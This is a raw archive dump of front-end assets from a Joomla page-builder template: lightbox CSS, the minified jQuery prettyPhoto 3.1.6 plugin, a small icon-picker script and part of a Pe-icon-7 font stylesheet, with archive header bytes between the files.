.pp_inline{color:#000;line-height:24px}.sppb-addon-modal{margin:0;padding:0;line-height:24px}.sppb-addon-modal>:first-child{margin-top:0;padding-top:0}.sppb-addon-modal>:last-child{margin-bottom:0;padding-bottom:0}.sppb-addon-modal-content{background:#fff;padding:30px}@media only screen and (max-width:767px){ .pp_pic_holder{width:100%!important;padding:10px 0!important;left:0!important;overflow-x:hidden!important}.pp_pic_holder.pp_default{width:100vw!important;margin-top:-150px!important;overflow:hidden}#pp_full_res img,.pp_content,.pp_details,.pp_fade{width:100%!important}div.pp_default .pp_content_container .pp_left{padding-left:0!important}div.pp_default .pp_content_container .pp_right{padding-right:0!important}.pp_content{height:auto!important}.pp_fade{height:100%!important}.pp_bottom,.pp_gallery,.pp_hoverContainer,.pp_top,a.pp_contract,a.pp_expand{display:none!important}#pp_full_res img{height:auto!important}.pp_details{box-sizing:border-box;margin-top:0!important;background:0 0!important;padding:10px 4% 10px 3%}a.pp_close{right:-15px!important;top:2px!important;padding:10px!important;position:relative!important;float:right}.pp_pic_holder iframe{width:100%!important;height:56vh!important}.pp_loaderIcon{margin-top:-1px!important}}PK!���S�S2flex/sppagebuilder/assets/js/jquery.prettyPhoto.jsnu&1i�/* ------------------------------------------------------------------------
	Class: prettyPhoto
	Use: Lightbox clone for jQuery
	Author: Stephane Caron (http://www.no-margin-for-errors.com)
	Version: 3.1.6
------------------------------------------------------------------------- */
!function(e){function t(){var e=location.href;return hashtag=-1!==e.indexOf("#prettyPhoto")?decodeURI(e.substring(e.indexOf("#prettyPhoto")+1,e.length)):!1,hashtag&&(hashtag=hashtag.replace(/<|>/g,"")),hashtag}function i(){"undefined"!=typeof theRel&&(location.hash=theRel+"/"+rel_index+"/")}function p(){-1!==location.href.indexOf("#prettyPhoto")&&(location.hash="prettyPhoto")}function o(e,t){e=e.replace(/[\[]/,"\\[").replace(/[\]]/,"\\]");var i="[\\?&]"+e+"=([^&#]*)",p=new RegExp(i),o=p.exec(t);return null==o?"":o[1]}e.prettyPhoto={version:"3.1.6"},e.fn.prettyPhoto=function(a){function s(){e(".pp_loaderIcon").hide(),projectedTop=scroll_pos.scrollTop+(I/2-f.containerHeight/2),projectedTop<0&&(projectedTop=0),$ppt.fadeTo(settings.animation_speed,1),$pp_pic_holder.find(".pp_content").animate({height:f.contentHeight,width:f.contentWidth},settings.animation_speed),$pp_pic_holder.animate({top:projectedTop,left:j/2-f.containerWidth/2<0?0:j/2-f.containerWidth/2,width:f.containerWidth},settings.animation_speed,function(){$pp_pic_holder.find(".pp_hoverContainer,#fullResImage").height(f.height).width(f.width),$pp_pic_holder.find(".pp_fade").fadeIn(settings.animation_speed),isSet&&"image"==h(pp_images[set_position])?$pp_pic_holder.find(".pp_hoverContainer").show():$pp_pic_holder.find(".pp_hoverContainer").hide(),settings.allow_expand&&(f.resized?e("a.pp_expand,a.pp_contract").show():e("a.pp_expand").hide()),!settings.autoplay_slideshow||P||v||e.prettyPhoto.startSlideshow(),settings.changepicturecallback(),v=!0}),m(),a.ajaxcallback()}function n(t){$pp_pic_holder.find("#pp_full_res object,#pp_full_res embed").css("visibility","hidden"),$pp_pic_holder.find(".pp_fade").fadeOut(settings.animation_speed,function(){e(".pp_loaderIcon").show(),t()})}function r(t){t>1?e(".pp_nav").show():e(".pp_nav").hide()}function l(e,t){if(resized=!1,d(e,t),imageWidth=e,imageHeight=t,(k>j||b>I)&&doresize&&settings.allow_resize&&!$){for(resized=!0,fitting=!1;!fitting;)k>j?(imageWidth=j-200,imageHeight=t/e*imageWidth):b>I?(imageHeight=I-200,imageWidth=e/t*imageHeight):fitting=!0,b=imageHeight,k=imageWidth;(k>j||b>I)&&l(k,b),d(imageWidth,imageHeight)}return{width:Math.floor(imageWidth),height:Math.floor(imageHeight),containerHeight:Math.floor(b),containerWidth:Math.floor(k)+2*settings.horizontal_padding,contentHeight:Math.floor(y),contentWidth:Math.floor(w),resized:resized}}function d(t,i){t=parseFloat(t),i=parseFloat(i),$pp_details=$pp_pic_holder.find(".pp_details"),$pp_details.width(t),detailsHeight=parseFloat($pp_details.css("marginTop"))+parseFloat($pp_details.css("marginBottom")),$pp_details=$pp_details.clone().addClass(settings.theme).width(t).appendTo(e("body")).css({position:"absolute",top:-1e4}),detailsHeight+=$pp_details.height(),detailsHeight=detailsHeight<=34?36:detailsHeight,$pp_details.remove(),$pp_title=$pp_pic_holder.find(".ppt"),$pp_title.width(t),titleHeight=parseFloat($pp_title.css("marginTop"))+parseFloat($pp_title.css("marginBottom")),$pp_title=$pp_title.clone().appendTo(e("body")).css({position:"absolute",top:-1e4}),titleHeight+=$pp_title.height(),$pp_title.remove(),y=i+detailsHeight,w=t,b=y+titleHeight+$pp_pic_holder.find(".pp_top").height()+$pp_pic_holder.find(".pp_bottom").height(),k=t}function h(e){return e.match(/youtube\.com\/watch/i)||e.match(/youtu\.be/i)?"youtube":e.match(/vimeo\.com/i)?"vimeo":e.match(/\b.mov\b/i)?"quicktime":e.match(/\b.swf\b/i)?"flash":e.match(/\biframe=true\b/i)?"iframe":e.match(/\bajax=true\b/i)?"ajax":e.match(/\bcustom=true\b/i)?"custom":"#"==e.substr(0,1)?"inline":"image"}function c(){if(doresize&&"undefined"!=typeof $pp_pic_holder){if(scroll_pos=_(),contentHeight=$pp_pic_holder.height(),contentwidth=$pp_pic_holder.width(),projectedTop=I/2+scroll_pos.scrollTop-contentHeight/2,projectedTop<0&&(projectedTop=0),contentHeight>I)return;$pp_pic_holder.css({top:projectedTop,left:j/2+scroll_pos.scrollLeft-contentwidth/2})}}function _(){return self.pageYOffset?{scrollTop:self.pageYOffset,scrollLeft:self.pageXOffset}:document.documentElement&&document.documentElement.scrollTop?{scrollTop:document.documentElement.scrollTop,scrollLeft:document.documentElement.scrollLeft}:document.body?{scrollTop:document.body.scrollTop,scrollLeft:document.body.scrollLeft}:void 0}function g(){I=e(window).height(),j=e(window).width(),"undefined"!=typeof $pp_overlay&&$pp_overlay.height(e(document).height()).width(j)}function m(){isSet&&settings.overlay_gallery&&"image"==h(pp_images[set_position])?(itemWidth=57,navWidth="facebook"==settings.theme||"pp_default"==settings.theme?50:30,itemsPerPage=Math.floor((f.containerWidth-100-navWidth)/itemWidth),itemsPerPage=itemsPerPage<pp_images.length?itemsPerPage:pp_images.length,totalPage=Math.ceil(pp_images.length/itemsPerPage)-1,0==totalPage?(navWidth=0,$pp_gallery.find(".pp_arrow_next,.pp_arrow_previous").hide()):$pp_gallery.find(".pp_arrow_next,.pp_arrow_previous").show(),galleryWidth=itemsPerPage*itemWidth,fullGalleryWidth=pp_images.length*itemWidth,$pp_gallery.css("margin-left",-(galleryWidth/2+navWidth/2)).find("div:first").width(galleryWidth+5).find("ul").width(fullGalleryWidth).find("li.selected").removeClass("selected"),goToPage=Math.floor(set_position/itemsPerPage)<totalPage?Math.floor(set_position/itemsPerPage):totalPage,e.prettyPhoto.changeGalleryPage(goToPage),$pp_gallery_li.filter(":eq("+set_position+")").addClass("selected")):$pp_pic_holder.find(".pp_content").unbind("mouseenter mouseleave")}function u(){if(settings.social_tools&&(facebook_like_link=settings.social_tools.replace("{location_href}",encodeURIComponent(location.href))),settings.markup=settings.markup.replace("{pp_social}",""),e("body").append(settings.markup),$pp_pic_holder=e(".pp_pic_holder"),$ppt=e(".ppt"),$pp_overlay=e("div.pp_overlay"),isSet&&settings.overlay_gallery){currentGalleryPage=0,toInject="";for(var t=0;t<pp_images.length;t++)pp_images[t].match(/\b(jpg|jpeg|png|gif)\b/gi)?(classname="",img_src=pp_images[t]):(classname="default",img_src=""),toInject+="<li class='"+classname+"'><a href='#'><img src='"+img_src+"' width='50' alt='' /></a></li>";toInject=settings.gallery_markup.replace(/{gallery}/g,toInject),$pp_pic_holder.find("#pp_full_res").after(toInject),$pp_gallery=e(".pp_pic_holder .pp_gallery"),$pp_gallery_li=$pp_gallery.find("li"),$pp_gallery.find(".pp_arrow_next").click(function(){return e.prettyPhoto.changeGalleryPage("next"),e.prettyPhoto.stopSlideshow(),!1}),$pp_gallery.find(".pp_arrow_previous").click(function(){return e.prettyPhoto.changeGalleryPage("previous"),e.prettyPhoto.stopSlideshow(),!1}),$pp_pic_holder.find(".pp_content").hover(function(){$pp_pic_holder.find(".pp_gallery:not(.disabled)").fadeIn()},function(){$pp_pic_holder.find(".pp_gallery:not(.disabled)").fadeOut()}),itemWidth=57,$pp_gallery_li.each(function(t){e(this).find("a").click(function(){return e.prettyPhoto.changePage(t),e.prettyPhoto.stopSlideshow(),!1})})}settings.slideshow&&($pp_pic_holder.find(".pp_nav").prepend('<a href="#" class="pp_play">Play</a>'),$pp_pic_holder.find(".pp_nav .pp_play").click(function(){return e.prettyPhoto.startSlideshow(),!1})),$pp_pic_holder.attr("class","pp_pic_holder "+settings.theme),$pp_overlay.css({opacity:0,height:e(document).height(),width:e(window).width()}).bind("click",function(){settings.modal||e.prettyPhoto.close()}),e("a.pp_close").bind("click",function(){return e.prettyPhoto.close(),!1}),settings.allow_expand&&e("a.pp_expand").bind("click",function(){return e(this).hasClass("pp_expand")?(e(this).removeClass("pp_expand").addClass("pp_contract"),doresize=!1):(e(this).removeClass("pp_contract").addClass("pp_expand"),doresize=!0),n(function(){e.prettyPhoto.open()}),!1}),$pp_pic_holder.find(".pp_previous, .pp_nav .pp_arrow_previous").bind("click",function(){return e.prettyPhoto.changePage("previous"),e.prettyPhoto.stopSlideshow(),!1}),$pp_pic_holder.find(".pp_next, .pp_nav .pp_arrow_next").bind("click",function(){return e.prettyPhoto.changePage("next"),e.prettyPhoto.stopSlideshow(),!1}),c()}a=jQuery.extend({hook:"rel",animation_speed:"fast",ajaxcallback:function(){},slideshow:5e3,autoplay_slideshow:!1,opacity:.8,show_title:!0,allow_resize:!0,allow_expand:!0,default_width:500,default_height:344,counter_separator_label:"/",theme:"pp_default",horizontal_padding:20,hideflash:!1,wmode:"opaque",autoplay:!0,modal:!1,deeplinking:!0,overlay_gallery:!0,overlay_gallery_max:30,keyboard_shortcuts:!0,changepicturecallback:function(){},callback:function(){},ie6_fallback:!0,markup:'<div class="pp_pic_holder"> 						<div class="ppt">&nbsp;</div> 						<div class="pp_top"> 							<div class="pp_left"></div> 							<div class="pp_middle"></div> 							<div class="pp_right"></div> 						</div> 						<div class="pp_content_container"> 							<div class="pp_left"> 							<div class="pp_right"> 								<div class="pp_content"> 									<div class="pp_loaderIcon"></div> 									<div class="pp_fade"> 										<a href="#" class="pp_expand" title="Expand the image">Expand</a> 										<div class="pp_hoverContainer"> 											<a class="pp_next" href="#">next</a> 											<a class="pp_previous" href="#">previous</a> 										</div> 										<div id="pp_full_res"></div> 										<div class="pp_details"> 											<div class="pp_nav"> 												<a href="#" class="pp_arrow_previous">Previous</a> 												<p class="currentTextHolder">0/0</p> 												<a href="#" class="pp_arrow_next">Next</a> 											</div> 											<p class="pp_description"></p> 											<div class="pp_social">{pp_social}</div> 											<a class="pp_close" href="#">Close</a> 										</div> 									</div> 								</div> 							</div> 							</div> 						</div> 						<div class="pp_bottom"> 							<div class="pp_left"></div> 							<div class="pp_middle"></div> 							<div class="pp_right"></div> 						</div> 					</div> 					<div class="pp_overlay"></div>',gallery_markup:'<div class="pp_gallery"> 								<a href="#" class="pp_arrow_previous">Previous</a> 								<div> 									<ul> 										{gallery} 									</ul> 								</div> 								<a href="#" class="pp_arrow_next">Next</a> 							</div>',image_markup:'<img id="fullResImage" src="{path}" />',flash_markup:'<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" width="{width}" height="{height}"><param name="wmode" value="{wmode}" /><param name="allowfullscreen" value="true" /><param name="allowscriptaccess" value="always" /><param name="movie" value="{path}" /><embed src="{path}" type="application/x-shockwave-flash" allowfullscreen="true" allowscriptaccess="always" width="{width}" height="{height}" wmode="{wmode}"></embed></object>',quicktime_markup:'<object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" codebase="http://www.apple.com/qtactivex/qtplugin.cab" height="{height}" width="{width}"><param name="src" value="{path}"><param name="autoplay" value="{autoplay}"><param name="type" value="video/quicktime"><embed src="{path}" height="{height}" width="{width}" autoplay="{autoplay}" type="video/quicktime" pluginspage="http://www.apple.com/quicktime/download/"></embed></object>',iframe_markup:'<iframe src ="{path}" width="{width}" height="{height}" frameborder="no"></iframe>',inline_markup:'<div class="pp_inline">{content}</div>',custom_markup:"",social_tools:'<div class="twitter"><a href="http://twitter.com/share" class="twitter-share-button" data-count="none">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script></div><div class="facebook"><iframe src="//www.facebook.com/plugins/like.php?locale=en_US&href={location_href}&layout=button_count&show_faces=true&width=500&action=like&font&colorscheme=light&height=23" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:500px; height:23px;" allowTransparency="true"></iframe></div>'},a);var f,v,y,w,b,k,P,x=this,$=!1,I=e(window).height(),j=e(window).width();return doresize=!0,scroll_pos=_(),e(window).unbind("resize.prettyphoto").bind("resize.prettyphoto",function(){c(),g()}),a.keyboard_shortcuts&&e(document).unbind("keydown.prettyphoto").bind("keydown.prettyphoto",function(t){if("undefined"!=typeof $pp_pic_holder&&$pp_pic_holder.is(":visible"))switch(t.keyCode){case 37:e.prettyPhoto.changePage("previous"),t.preventDefault();break;case 39:e.prettyPhoto.changePage("next"),t.preventDefault();break;case 27:settings.modal||e.prettyPhoto.close(),t.preventDefault()}}),e.prettyPhoto.initialize=function(){return settings=a,"pp_default"==settings.theme&&(settings.horizontal_padding=16),theRel=e(this).attr(settings.hook),galleryRegExp=/\[(?:.*)\]/,isSet=galleryRegExp.exec(theRel)?!0:!1,pp_images=isSet?jQuery.map(x,function(t){return-1!=e(t).attr(settings.hook).indexOf(theRel)?e(t).attr("href"):void 0}):e.makeArray(e(this).attr("href")),pp_titles=isSet?jQuery.map(x,function(t){return-1!=e(t).attr(settings.hook).indexOf(theRel)?e(t).find("img").attr("alt")?e(t).find("img").attr("alt"):"":void 0}):e.makeArray(e(this).find("img").attr("alt")),pp_descriptions=isSet?jQuery.map(x,function(t){return-1!=e(t).attr(settings.hook).indexOf(theRel)?e(t).attr("title")?e(t).attr("title"):"":void 0}):e.makeArray(e(this).attr("title")),pp_images.length>settings.overlay_gallery_max&&(settings.overlay_gallery=!1),set_position=jQuery.inArray(e(this).attr("href"),pp_images),rel_index=isSet?set_position:e("a["+settings.hook+"^='"+theRel+"']").index(e(this)),u(this),settings.allow_resize&&e(window).bind("scroll.prettyphoto",function(){c()}),e.prettyPhoto.open(),!1},e.prettyPhoto.open=function(t){return"undefined"==typeof settings&&(settings=a,pp_images=e.makeArray(arguments[0]),pp_titles=e.makeArray(arguments[1]?arguments[1]:""),pp_descriptions=e.makeArray(arguments[2]?arguments[2]:""),isSet=pp_images.length>1?!0:!1,set_position=arguments[3]?arguments[3]:0,u(t.target)),settings.hideflash&&e("object,embed,iframe[src*=youtube],iframe[src*=vimeo]").css("visibility","hidden"),r(e(pp_images).size()),e(".pp_loaderIcon").show(),settings.deeplinking&&i(),settings.social_tools&&(facebook_like_link=settings.social_tools.replace("{location_href}",encodeURIComponent(location.href)),$pp_pic_holder.find(".pp_social").html(facebook_like_link)),$ppt.is(":hidden")&&$ppt.css("opacity",0).show(),$pp_overlay.show().fadeTo(settings.animation_speed,settings.opacity),$pp_pic_holder.find(".currentTextHolder").text(set_position+1+settings.counter_separator_label+e(pp_images).size()),"undefined"!=typeof pp_descriptions[set_position]&&""!=pp_descriptions[set_position]?$pp_pic_holder.find(".pp_description").show().html(unescape(pp_descriptions[set_position])):$pp_pic_holder.find(".pp_description").hide(),movie_width=parseFloat(o("width",pp_images[set_position]))?o("width",pp_images[set_position]):settings.default_width.toString(),movie_height=parseFloat(o("height",pp_images[set_position]))?o("height",pp_images[set_position]):settings.default_height.toString(),$=!1,-1!=movie_height.indexOf("%")&&(movie_height=parseFloat(e(window).height()*parseFloat(movie_height)/100-150),$=!0),-1!=movie_width.indexOf("%")&&(movie_width=parseFloat(e(window).width()*parseFloat(movie_width)/100-150),$=!0),$pp_pic_holder.fadeIn(function(){switch($ppt.html(settings.show_title&&""!=pp_titles[set_position]&&"undefined"!=typeof pp_titles[set_position]?unescape(pp_titles[set_position]):"&nbsp;"),imgPreloader="",skipInjection=!1,h(pp_images[set_position])){case"image":imgPreloader=new Image,nextImage=new Image,isSet&&set_position<e(pp_images).size()-1&&(nextImage.src=pp_images[set_position+1]),prevImage=new Image,isSet&&pp_images[set_position-1]&&(prevImage.src=pp_images[set_position-1]),$pp_pic_holder.find("#pp_full_res")[0].innerHTML=settings.image_markup.replace(/{path}/g,pp_images[set_position]),imgPreloader.onload=function(){f=l(imgPreloader.width,imgPreloader.height),s()},imgPreloader.onerror=function(){alert("Image cannot be loaded. Make sure the path is correct and image exist."),e.prettyPhoto.close()},imgPreloader.src=pp_images[set_position];break;case"youtube":f=l(movie_width,movie_height),movie_id=o("v",pp_images[set_position]),""==movie_id&&(movie_id=pp_images[set_position].split("youtu.be/"),movie_id=movie_id[1],movie_id.indexOf("?")>0&&(movie_id=movie_id.substr(0,movie_id.indexOf("?"))),movie_id.indexOf("&")>0&&(movie_id=movie_id.substr(0,movie_id.indexOf("&")))),movie="//www.youtube.com/embed/"+movie_id,movie+=o("rel",pp_images[set_position])?"?rel="+o("rel",pp_images[set_position]):"?rel=1",settings.autoplay&&(movie+="&autoplay=1"),toInject=settings.iframe_markup.replace(/{width}/g,f.width).replace(/{height}/g,f.height).replace(/{wmode}/g,settings.wmode).replace(/{path}/g,movie);break;case"vimeo":f=l(movie_width,movie_height),movie_id=pp_images[set_position];var t=/http(s?):\/\/(www\.)?vimeo.com\/(\d+)/,i=movie_id.match(t);movie="http://player.vimeo.com/video/"+i[3]+"?title=0&byline=0&portrait=0",settings.autoplay&&(movie+="&autoplay=1;"),vimeo_width=f.width+"/embed/?moog_width="+f.width,toInject=settings.iframe_markup.replace(/{width}/g,vimeo_width).replace(/{height}/g,f.height).replace(/{path}/g,movie);break;case"quicktime":f=l(movie_width,movie_height),f.height+=15,f.contentHeight+=15,f.containerHeight+=15,toInject=settings.quicktime_markup.replace(/{width}/g,f.width).replace(/{height}/g,f.height).replace(/{wmode}/g,settings.wmode).replace(/{path}/g,pp_images[set_position]).replace(/{autoplay}/g,settings.autoplay);break;case"flash":f=l(movie_width,movie_height),flash_vars=pp_images[set_position],flash_vars=flash_vars.substring(pp_images[set_position].indexOf("flashvars")+10,pp_images[set_position].length),filename=pp_images[set_position],filename=filename.substring(0,filename.indexOf("?")),toInject=settings.flash_markup.replace(/{width}/g,f.width).replace(/{height}/g,f.height).replace(/{wmode}/g,settings.wmode).replace(/{path}/g,filename+"?"+flash_vars);break;case"iframe":f=l(movie_width,movie_height),frame_url=pp_images[set_position],frame_url=frame_url.substr(0,frame_url.indexOf("iframe")-1),toInject=settings.iframe_markup.replace(/{width}/g,f.width).replace(/{height}/g,f.height).replace(/{path}/g,frame_url);break;case"ajax":doresize=!1,f=l(movie_width,movie_height),doresize=!0,skipInjection=!0,e.get(pp_images[set_position],function(e){toInject=settings.inline_markup.replace(/{content}/g,e),$pp_pic_holder.find("#pp_full_res")[0].innerHTML=toInject,s()});break;case"custom":f=l(movie_width,movie_height),toInject=settings.custom_markup;break;case"inline":myClone=e(pp_images[set_position]).clone().append('<br clear="all" />').css({width:settings.default_width}).wrapInner('<div id="pp_full_res"><div class="pp_inline"></div></div>').appendTo(e("body")).show(),doresize=!1,f=l(e(myClone).width(),e(myClone).height()),doresize=!0,e(myClone).remove(),toInject=settings.inline_markup.replace(/{content}/g,e(pp_images[set_position]).html())}imgPreloader||skipInjection||($pp_pic_holder.find("#pp_full_res")[0].innerHTML=toInject,s())}),!1},e.prettyPhoto.changePage=function(t){currentGalleryPage=0,"previous"==t?(set_position--,set_position<0&&(set_position=e(pp_images).size()-1)):"next"==t?(set_position++,set_position>e(pp_images).size()-1&&(set_position=0)):set_position=t,rel_index=set_position,doresize||(doresize=!0),settings.allow_expand&&e(".pp_contract").removeClass("pp_contract").addClass("pp_expand"),n(function(){e.prettyPhoto.open()})},e.prettyPhoto.changeGalleryPage=function(e){"next"==e?(currentGalleryPage++,currentGalleryPage>totalPage&&(currentGalleryPage=0)):"previous"==e?(currentGalleryPage--,currentGalleryPage<0&&(currentGalleryPage=totalPage)):currentGalleryPage=e,slide_speed="next"==e||"previous"==e?settings.animation_speed:0,slide_to=currentGalleryPage*itemsPerPage*itemWidth,$pp_gallery.find("ul").animate({left:-slide_to},slide_speed)},e.prettyPhoto.startSlideshow=function(){"undefined"==typeof P?($pp_pic_holder.find(".pp_play").unbind("click").removeClass("pp_play").addClass("pp_pause").click(function(){return e.prettyPhoto.stopSlideshow(),!1}),P=setInterval(e.prettyPhoto.startSlideshow,settings.slideshow)):e.prettyPhoto.changePage("next")},e.prettyPhoto.stopSlideshow=function(){$pp_pic_holder.find(".pp_pause").unbind("click").removeClass("pp_pause").addClass("pp_play").click(function(){return e.prettyPhoto.startSlideshow(),!1}),clearInterval(P),P=void 0},e.prettyPhoto.close=function(){$pp_overlay.is(":animated")||(e.prettyPhoto.stopSlideshow(),$pp_pic_holder.stop().find("object,embed").css("visibility","hidden"),e("div.pp_pic_holder,div.ppt,.pp_fade").fadeOut(settings.animation_speed,function(){e(this).remove()}),$pp_overlay.fadeOut(settings.animation_speed,function(){settings.hideflash&&e("object,embed,iframe[src*=youtube],iframe[src*=vimeo]").css("visibility","visible"),e(this).remove(),e(window).unbind("scroll.prettyphoto"),p(),settings.callback(),doresize=!0,v=!1,delete settings}))},!pp_alreadyInitialized&&t()&&(pp_alreadyInitialized=!0,hashIndex=t(),hashRel=hashIndex,hashIndex=hashIndex.substring(hashIndex.indexOf("/")+1,hashIndex.length-1),hashRel=hashRel.substring(0,hashRel.indexOf("/")),setTimeout(function(){e("a["+a.hook+"^='"+hashRel+"']:eq("+hashIndex+")").trigger("click")},50)),this.unbind("click.prettyphoto").bind("click.prettyphoto",e.prettyPhoto.initialize)}}(jQuery);var pp_alreadyInitialized=!1;PK!h��&flex/sppagebuilder/fields/js/peicon.jsnu&1i�
jQuery(function($) {

  // Init dropdown
  $(document).on('click', '.pixeden-icon-input', function(event) {
    event.preventDefault();
    $(this).closest('.pixeden-icon-chooser').toggleClass('open');

    if($(this).closest('.pixeden-icon-chooser').hasClass('open')) {
      $(this).closest('.pixeden-icon-chooser').find('input[type="text"]').focus();
    }
  });


  // Select Icon
  $(document).on('click', '.pe-list-icon', function(event) {
    event.preventDefault();
    var $this = $(this);
    var parent = $this.closest('.pixeden-icon-chooser')
    var pe_icons = $(this).closest('ul').find('>li');
    
    pe_icons.removeClass('active');
    $this.addClass('active');
    
    parent.find('.pixeden-icon-input>span').html('<i class="pe '+ $this.data('pixeden_icon') +'"></i> ' + $this.data('pixeden_icon_name'));
	parent.find('.addon-input-pe').val($this.data('pixeden_icon_name'));
	parent.addClass('has-pe-icon').removeClass('open');
  });


  // Search Icon
  $(document).on('keyup', '.pixeden-dropdown input[type="text"]', function(){
    var value = $(this).val();
    var exp = new RegExp('.*?' + value + '.*?', 'i');

    $(this).next('.pixeden-icons').children().each(function() {
      var isMatch = exp.test($('span', this).text());
      $(this).toggle(isMatch);
    });
  });

  // Remove Icon
  $(document).on('click', '.remove-pe-icon', function(event) {
    event.stopPropagation();
    event.preventDefault();
    var $this = $(this);
    var parent = $this.closest('.pixeden-icon-chooser');

    parent.removeClass('has-pe-icon');
    parent.find('.pixeden-icon-input>span').html('--' + Joomla.JText._('COM_SPPAGEBUILDER_ADDON_ICON_SELECT') + '--');
    parent.find('.pixeden-icons>li').removeClass('active');
    parent.find('.addon-input-pe').val('');
  });
  
});PK!�W��O�O(flex/sppagebuilder/fields/css/peicon.cssnu&1i�@font-face {
	font-family: 'peIcon7';
	src: url('../fonts/Pe-icon-7-stroke.eot?d7yf1v');
	src: url('../fonts/Pe-icon-7-stroke.eot?#iefixd7yf1v') format('embedded-opentype'),
		url('../fonts/Pe-icon-7-stroke.woff?d7yf1v') format('woff'),
		url('../fonts/Pe-icon-7-stroke.ttf?d7yf1v') format('truetype'),
		url('../fonts/Pe-icon-7-stroke.svg?d7yf1v#Pe-icon-7-stroke') format('svg');
	font-weight: normal;
	font-style: normal;
}


[class^="pe-7s-"], [class*=" pe-7s-"] {
	display: inline-block;
	font-family: 'peIcon7';
	speak: none;
	font-style: normal;
	font-weight: normal;
	font-variant: normal;
	text-transform: none;
	line-height: 1;

	/* Better Font Rendering =========== */
	-webkit-font-smoothing: antialiased;
	-moz-osx-font-smoothing: grayscale;
}

.pe-7s-album:before {
	content: "\e6aa";
}
.pe-7s-arc:before {
	content: "\e6ab";
}
.pe-7s-back-2:before {
	content: "\e6ac";
}
.pe-7s-bandaid:before {
	content: "\e6ad";
}
.pe-7s-car:before {
	content: "\e6ae";
}
.pe-7s-diamond:before {
	content: "\e6af";
}
.pe-7s-door-lock:before {
	content: "\e6b0";
}
.pe-7s-eyedropper:before {
	content: "\e6b1";
}
.pe-7s-female:before {
	content: "\e6b2";
}
.pe-7s-gym:before {
	content: "\e6b3";
}
.pe-7s-hammer:before {
	content: "\e6b4";
}
.pe-7s-headphones:before {
	content: "\e6b5";
}
.pe-7s-helm:before {
	content: "\e6b6";
}
.pe-7s-hourglass:before {
	content: "\e6b7";
}
.pe-7s-leaf:before {
	content: "\e6b8";
}
.pe-7s-magic-wand:before {
	content: "\e6b9";
}
.pe-7s-male:before {
	content: "\e6ba";
}
.pe-7s-map-2:before {
	content: "\e6bb";
}
.pe-7s-next-2:before {
	content: "\e6bc";
}
.pe-7s-paint-bucket:before {
	content: "\e6bd";
}
.pe-7s-pendrive:before {
	content: "\e6be";
}
.pe-7s-photo:before {
	content: "\e6bf";
}
.pe-7s-piggy:before {
	content: "\e6c0";
}
.pe-7s-plugin:before {
	content: "\e6c1";
}
.pe-7s-refresh-2:before {
	content: "\e6c2";
}
.pe-7s-rocket:before {
	content: "\e6c3";
}
.pe-7s-settings:before {
	content: "\e6c4";
}
.pe-7s-shield:before {
	content: "\e6c5";
}
.pe-7s-smile:before {
	content: "\e6c6";
}
.pe-7s-usb:before {
	content: "\e6c7";
}
.pe-7s-vector:before {
	content: "\e6c8";
}
.pe-7s-wine:before {
	content: "\e6c9";
}
.pe-7s-cloud-upload:before {
	content: "\e68a";
}
.pe-7s-cash:before {
	content: "\e68c";
}
.pe-7s-close:before {
	content: "\e680";
}
.pe-7s-bluetooth:before {
	content: "\e68d";
}
.pe-7s-cloud-download:before {
	content: "\e68b";
}
.pe-7s-way:before {
	content: "\e68e";
}
.pe-7s-close-circle:before {
	content: "\e681";
}
.pe-7s-id:before {
	content: "\e68f";
}
.pe-7s-angle-up:before {
	content: "\e682";
}
.pe-7s-wristwatch:before {
	content: "\e690";
}
.pe-7s-angle-up-circle:before {
	content: "\e683";
}
.pe-7s-world:before {
	content: "\e691";
}
.pe-7s-angle-right:before {
	content: "\e684";
}
.pe-7s-volume:before {
	content: "\e692";
}
.pe-7s-angle-right-circle:before {
	content: "\e685";
}
.pe-7s-users:before {
	content: "\e693";
}
.pe-7s-angle-left:before {
	content: "\e686";
}
.pe-7s-user-female:before {
	content: "\e694";
}
.pe-7s-angle-left-circle:before {
	content: "\e687";
}
.pe-7s-up-arrow:before {
	content: "\e695";
}
.pe-7s-angle-down:before {
	content: "\e688";
}
.pe-7s-switch:before {
	content: "\e696";
}
.pe-7s-angle-down-circle:before {
	content: "\e689";
}
.pe-7s-scissors:before {
	content: "\e697";
}
.pe-7s-wallet:before {
	content: "\e600";
}
.pe-7s-safe:before {
	content: "\e698";
}
.pe-7s-volume2:before {
	content: "\e601";
}
.pe-7s-volume1:before {
	content: "\e602";
}
.pe-7s-voicemail:before {
	content: "\e603";
}
.pe-7s-video:before {
	content: "\e604";
}
.pe-7s-user:before {
	content: "\e605";
}
.pe-7s-upload:before {
	content: "\e606";
}
.pe-7s-unlock:before {
	content: "\e607";
}
.pe-7s-umbrella:before {
	content: "\e608";
}
.pe-7s-trash:before {
	content: "\e609";
}
.pe-7s-tools:before {
	content: "\e60a";
}
.pe-7s-timer:before {
	content: "\e60b";
}
.pe-7s-ticket:before {
	content: "\e60c";
}
.pe-7s-target:before {
	content: "\e60d";
}
.pe-7s-sun:before {
	content: "\e60e";
}
.pe-7s-study:before {
	content: "\e60f";
}
.pe-7s-stopwatch:before {
	content: "\e610";
}
.pe-7s-star:before {
	content: "\e611";
}
.pe-7s-speaker:before {
	content: "\e612";
}
.pe-7s-signal:before {
	content: "\e613";
}
.pe-7s-shuffle:before {
	content: "\e614";
}
.pe-7s-shopbag:before {
	content: "\e615";
}
.pe-7s-share:before {
	content: "\e616";
}
.pe-7s-server:before {
	content: "\e617";
}
.pe-7s-search:before {
	content: "\e618";
}
.pe-7s-film:before {
	content: "\e6a5";
}
.pe-7s-science:before {
	content: "\e619";
}
.pe-7s-disk:before {
	content: "\e6a6";
}
.pe-7s-ribbon:before {
	content: "\e61a";
}
.pe-7s-repeat:before {
	content: "\e61b";
}
.pe-7s-refresh:before {
	content: "\e61c";
}
.pe-7s-add-user:before {
	content: "\e6a9";
}
.pe-7s-refresh-cloud:before {
	content: "\e61d";
}
.pe-7s-paperclip:before {
	content: "\e69c";
}
.pe-7s-radio:before {
	content: "\e61e";
}
.pe-7s-note2:before {
	content: "\e69d";
}
.pe-7s-print:before {
	content: "\e61f";
}
.pe-7s-network:before {
	content: "\e69e";
}
.pe-7s-prev:before {
	content: "\e620";
}
.pe-7s-mute:before {
	content: "\e69f";
}
.pe-7s-power:before {
	content: "\e621";
}
.pe-7s-medal:before {
	content: "\e6a0";
}
.pe-7s-portfolio:before {
	content: "\e622";
}
.pe-7s-like2:before {
